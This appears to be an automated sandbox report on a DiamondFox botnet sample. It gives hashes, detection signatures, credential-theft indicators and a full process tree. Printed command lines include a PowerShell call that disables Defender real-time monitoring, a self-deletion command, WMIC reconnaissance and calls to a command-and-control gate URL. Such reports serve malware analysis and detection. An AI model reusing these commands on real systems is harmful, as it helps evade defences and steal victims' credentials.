Analysis
-
max time kernel
128s -
max time network
126s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
04-07-2021 02:54
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe
Resource
win10v20210408
General
-
Target
SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe
-
Size
203KB
-
MD5
a1e165e1926c0c83123c89fce6b1af56
-
SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f
-
SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
-
SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
Malware Config
Signatures
-
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
-
DiamondFox payload 10 IoCs
Detects DiamondFox payload in file/memory.
resource yara_rule behavioral2/files/0x000300000001ab4b-115.dat diamondfox behavioral2/files/0x000300000001ab4b-116.dat diamondfox behavioral2/files/0x000300000001ab4b-197.dat diamondfox behavioral2/files/0x000300000001ab4b-201.dat diamondfox behavioral2/files/0x000300000001ab4b-204.dat diamondfox behavioral2/files/0x000300000001ab4b-210.dat diamondfox behavioral2/files/0x000300000001ab4b-213.dat diamondfox behavioral2/files/0x000300000001ab4b-215.dat diamondfox behavioral2/files/0x000300000001ab4b-220.dat diamondfox behavioral2/files/0x000300000001ab4b-223.dat diamondfox -
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/3284-209-0x000000000044412E-mapping.dmp MailPassView behavioral2/memory/3284-211-0x0000000000400000-0x0000000000455000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/2004-196-0x00000000004466F4-mapping.dmp WebBrowserPassView behavioral2/memory/2004-198-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView -
Nirsoft 6 IoCs
resource yara_rule behavioral2/memory/2004-196-0x00000000004466F4-mapping.dmp Nirsoft behavioral2/memory/2004-198-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft behavioral2/memory/2272-203-0x0000000000413E10-mapping.dmp Nirsoft behavioral2/memory/2272-207-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft behavioral2/memory/3284-209-0x000000000044412E-mapping.dmp Nirsoft behavioral2/memory/3284-211-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft -
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
pid Process 2708 MicrosoftEdgeCPS.exe 2004 MicrosoftEdgeCPS.exe 3156 MicrosoftEdgeCPS.exe 2272 MicrosoftEdgeCPS.exe 3284 MicrosoftEdgeCPS.exe 684 MicrosoftEdgeCPS.exe 196 MicrosoftEdgeCPS.exe 1496 MicrosoftEdgeCPS.exe 348 MicrosoftEdgeCPS.exe 2160 localmgr.exe -
Deletes itself 1 IoCs
pid Process 2184 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 2708 set thread context of 2004 2708 MicrosoftEdgeCPS.exe 97 PID 2708 set thread context of 3156 2708 MicrosoftEdgeCPS.exe 98 PID 2708 set thread context of 2272 2708 MicrosoftEdgeCPS.exe 99 PID 2708 set thread context of 3284 2708 MicrosoftEdgeCPS.exe 100 PID 2708 set thread context of 684 2708 MicrosoftEdgeCPS.exe 101 PID 2708 set thread context of 196 2708 MicrosoftEdgeCPS.exe 104 PID 2708 set thread context of 1496 2708 MicrosoftEdgeCPS.exe 105 PID 2708 set thread context of 348 2708 MicrosoftEdgeCPS.exe 106 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 4 IoCs
pid Process 3152 taskkill.exe 2760 taskkill.exe 2692 taskkill.exe 4032 taskkill.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 4000 notepad.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 2184 powershell.exe 1380 powershell.exe 1380 powershell.exe 2184 powershell.exe 1380 powershell.exe 2184 powershell.exe 2708 MicrosoftEdgeCPS.exe 2708 MicrosoftEdgeCPS.exe 2004 MicrosoftEdgeCPS.exe 2004 MicrosoftEdgeCPS.exe 2004 MicrosoftEdgeCPS.exe 2004 MicrosoftEdgeCPS.exe 2272 MicrosoftEdgeCPS.exe 2272 MicrosoftEdgeCPS.exe 2708 MicrosoftEdgeCPS.exe 2708 MicrosoftEdgeCPS.exe 2708 MicrosoftEdgeCPS.exe 2708 MicrosoftEdgeCPS.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 3548 wmic.exe Token: SeSecurityPrivilege 3548 wmic.exe Token: SeTakeOwnershipPrivilege 3548 wmic.exe Token: SeLoadDriverPrivilege 3548 wmic.exe Token: SeSystemProfilePrivilege 3548 wmic.exe Token: SeSystemtimePrivilege 3548 wmic.exe Token: SeProfSingleProcessPrivilege 3548 wmic.exe Token: SeIncBasePriorityPrivilege 3548 wmic.exe Token: SeCreatePagefilePrivilege 3548 wmic.exe Token: SeBackupPrivilege 3548 wmic.exe Token: SeRestorePrivilege 3548 wmic.exe Token: SeShutdownPrivilege 3548 wmic.exe Token: SeDebugPrivilege 3548 wmic.exe Token: SeSystemEnvironmentPrivilege 3548 wmic.exe Token: SeRemoteShutdownPrivilege 3548 wmic.exe Token: SeUndockPrivilege 3548 wmic.exe Token: SeManageVolumePrivilege 3548 wmic.exe Token: 33 3548 wmic.exe Token: 34 3548 wmic.exe Token: 35 3548 wmic.exe Token: 36 3548 wmic.exe Token: SeIncreaseQuotaPrivilege 3548 wmic.exe Token: SeSecurityPrivilege 3548 wmic.exe Token: SeTakeOwnershipPrivilege 3548 wmic.exe Token: SeLoadDriverPrivilege 3548 wmic.exe Token: SeSystemProfilePrivilege 3548 wmic.exe Token: SeSystemtimePrivilege 3548 wmic.exe Token: SeProfSingleProcessPrivilege 3548 wmic.exe Token: SeIncBasePriorityPrivilege 3548 wmic.exe Token: SeCreatePagefilePrivilege 3548 wmic.exe Token: SeBackupPrivilege 3548 wmic.exe Token: SeRestorePrivilege 3548 wmic.exe Token: SeShutdownPrivilege 3548 wmic.exe Token: SeDebugPrivilege 3548 wmic.exe Token: SeSystemEnvironmentPrivilege 3548 wmic.exe Token: SeRemoteShutdownPrivilege 3548 wmic.exe Token: SeUndockPrivilege 3548 wmic.exe Token: SeManageVolumePrivilege 3548 wmic.exe Token: 33 3548 wmic.exe Token: 34 3548 wmic.exe Token: 35 3548 wmic.exe Token: 36 3548 wmic.exe Token: SeDebugPrivilege 1380 powershell.exe Token: SeDebugPrivilege 2184 powershell.exe Token: SeIncreaseQuotaPrivilege 4000 wmic.exe Token: SeSecurityPrivilege 4000 wmic.exe Token: SeTakeOwnershipPrivilege 4000 wmic.exe Token: SeLoadDriverPrivilege 4000 wmic.exe Token: SeSystemProfilePrivilege 4000 wmic.exe Token: SeSystemtimePrivilege 4000 wmic.exe Token: SeProfSingleProcessPrivilege 4000 wmic.exe Token: SeIncBasePriorityPrivilege 4000 wmic.exe Token: SeCreatePagefilePrivilege 4000 wmic.exe Token: SeBackupPrivilege 4000 wmic.exe Token: SeRestorePrivilege 4000 wmic.exe Token: SeShutdownPrivilege 4000 wmic.exe Token: SeDebugPrivilege 4000 wmic.exe Token: SeSystemEnvironmentPrivilege 4000 wmic.exe Token: SeRemoteShutdownPrivilege 4000 wmic.exe Token: SeUndockPrivilege 4000 wmic.exe Token: SeManageVolumePrivilege 4000 wmic.exe Token: 33 4000 wmic.exe Token: 34 4000 wmic.exe Token: 35 4000 wmic.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 3156 MicrosoftEdgeCPS.exe 196 MicrosoftEdgeCPS.exe 1496 MicrosoftEdgeCPS.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 632 wrote to memory of 2708 632 SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe 77 PID 632 wrote to memory of 2708 632 SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe 77 PID 632 wrote to memory of 2708 632 SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe 77 PID 632 wrote to memory of 2184 632 SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe 78 PID 632 wrote to memory of 2184 632 SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe 78 PID 632 wrote to memory of 2184 632 SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe 78 PID 2708 wrote to memory of 1380 2708 MicrosoftEdgeCPS.exe 79 PID 2708 wrote to memory of 1380 2708 MicrosoftEdgeCPS.exe 79 PID 2708 wrote to memory of 1380 2708 MicrosoftEdgeCPS.exe 79 PID 2708 wrote to memory of 3548 2708 MicrosoftEdgeCPS.exe 82 PID 2708 wrote to memory of 3548 2708 MicrosoftEdgeCPS.exe 82 PID 2708 wrote to memory of 3548 2708 MicrosoftEdgeCPS.exe 82 PID 2708 wrote to memory of 4000 2708 MicrosoftEdgeCPS.exe 84 PID 2708 wrote to memory of 4000 2708 MicrosoftEdgeCPS.exe 84 PID 2708 wrote to memory of 4000 2708 MicrosoftEdgeCPS.exe 84 PID 2708 wrote to memory of 2940 2708 MicrosoftEdgeCPS.exe 86 PID 2708 wrote to memory of 2940 2708 MicrosoftEdgeCPS.exe 86 PID 2708 wrote to memory of 2940 2708 MicrosoftEdgeCPS.exe 86 PID 2708 wrote to memory of 3156 2708 MicrosoftEdgeCPS.exe 88 PID 2708 wrote to memory of 3156 2708 MicrosoftEdgeCPS.exe 88 PID 2708 wrote to memory of 3156 2708 MicrosoftEdgeCPS.exe 88 PID 2708 wrote to memory of 2760 2708 MicrosoftEdgeCPS.exe 90 PID 2708 wrote to memory of 2760 2708 MicrosoftEdgeCPS.exe 90 PID 2708 wrote to memory of 2760 2708 MicrosoftEdgeCPS.exe 90 PID 2708 wrote to memory of 640 2708 MicrosoftEdgeCPS.exe 93 PID 2708 wrote to memory of 640 2708 MicrosoftEdgeCPS.exe 93 PID 2708 wrote to memory of 640 2708 MicrosoftEdgeCPS.exe 93 PID 2708 wrote to memory of 2464 2708 MicrosoftEdgeCPS.exe 95 PID 2708 wrote to memory of 2464 2708 MicrosoftEdgeCPS.exe 95 PID 2708 wrote to memory of 2464 2708 MicrosoftEdgeCPS.exe 95 PID 2708 wrote to memory of 2004 2708 MicrosoftEdgeCPS.exe 97 PID 2708 wrote to memory of 2004 2708 MicrosoftEdgeCPS.exe 97 PID 2708 wrote to memory of 2004 2708 MicrosoftEdgeCPS.exe 97 PID 2708 wrote to memory of 2004 2708 MicrosoftEdgeCPS.exe 97 PID 2708 wrote to memory of 2004 2708 MicrosoftEdgeCPS.exe 97 PID 2708 wrote to memory of 2004 2708 MicrosoftEdgeCPS.exe 97 PID 2708 wrote to memory of 2004 2708 MicrosoftEdgeCPS.exe 97 PID 2708 wrote to memory of 2004 2708 MicrosoftEdgeCPS.exe 97 PID 2708 wrote to memory of 2004 2708 MicrosoftEdgeCPS.exe 97 PID 2708 wrote to memory of 3156 2708 MicrosoftEdgeCPS.exe 98 PID 2708 wrote to memory of 3156 2708 MicrosoftEdgeCPS.exe 98 PID 2708 wrote to memory of 3156 2708 MicrosoftEdgeCPS.exe 98 PID 2708 wrote to memory of 3156 2708 MicrosoftEdgeCPS.exe 98 PID 2708 wrote to memory of 3156 2708 MicrosoftEdgeCPS.exe 98 PID 2708 wrote to memory of 3156 2708 MicrosoftEdgeCPS.exe 98 PID 2708 wrote to memory of 3156 2708 MicrosoftEdgeCPS.exe 98 PID 2708 wrote to memory of 3156 2708 MicrosoftEdgeCPS.exe 98 PID 2708 wrote to memory of 2272 2708 MicrosoftEdgeCPS.exe 99 PID 2708 wrote to memory of 2272 2708 MicrosoftEdgeCPS.exe 99 PID 2708 wrote to memory of 2272 2708 MicrosoftEdgeCPS.exe 99 PID 2708 wrote to memory of 2272 2708 MicrosoftEdgeCPS.exe 99 PID 2708 wrote to memory of 2272 2708 MicrosoftEdgeCPS.exe 99 PID 2708 wrote to memory of 2272 2708 MicrosoftEdgeCPS.exe 99 PID 2708 wrote to memory of 2272 2708 MicrosoftEdgeCPS.exe 99 PID 2708 wrote to memory of 2272 2708 MicrosoftEdgeCPS.exe 99 PID 2708 wrote to memory of 2272 2708 MicrosoftEdgeCPS.exe 99 PID 2708 wrote to memory of 3284 2708 MicrosoftEdgeCPS.exe 100 PID 2708 wrote to memory of 3284 2708 MicrosoftEdgeCPS.exe 100 PID 2708 wrote to memory of 3284 2708 MicrosoftEdgeCPS.exe 100 PID 2708 wrote to memory of 3284 2708 MicrosoftEdgeCPS.exe 100 PID 2708 wrote to memory of 3284 2708 MicrosoftEdgeCPS.exe 100 PID 2708 wrote to memory of 3284 2708 MicrosoftEdgeCPS.exe 100 PID 2708 wrote to memory of 3284 2708 MicrosoftEdgeCPS.exe 100 PID 2708 wrote to memory of 3284 2708 MicrosoftEdgeCPS.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1380
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3548
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" os get caption /FORMAT:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4000
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get caption /FORMAT:List3⤵PID:2940
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List3⤵PID:3156
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List3⤵PID:2760
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵PID:640
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵PID:2464
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\1.log"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2004
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\4.log"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3156
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\2.log"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2272
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\3.log"3⤵
- Executes dropped EXE
PID:3284
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
PID:684 -
C:\Windows\notepad.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
- Opens file in notepad (likely ransom note)
PID:4000
-
-
C:\Windows\write.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵PID:200
-
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:196
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1496
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
PID:348
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵PID:1488
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵PID:3296
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 684 /F3⤵
- Kills process with taskkill
PID:3152
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 196 /F3⤵
- Kills process with taskkill
PID:2760
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 348 /F3⤵
- Kills process with taskkill
PID:2692
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 1496 /F3⤵
- Kills process with taskkill
PID:4032
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵PID:792
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵PID:3728
-
-
C:\Users\Admin\AppData\Local\Temp\localmgr.exe"C:\Users\Admin\AppData\Local\Temp\localmgr.exe"3⤵
- Executes dropped EXE
PID:2160
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe' -Force -Recurse2⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2184
-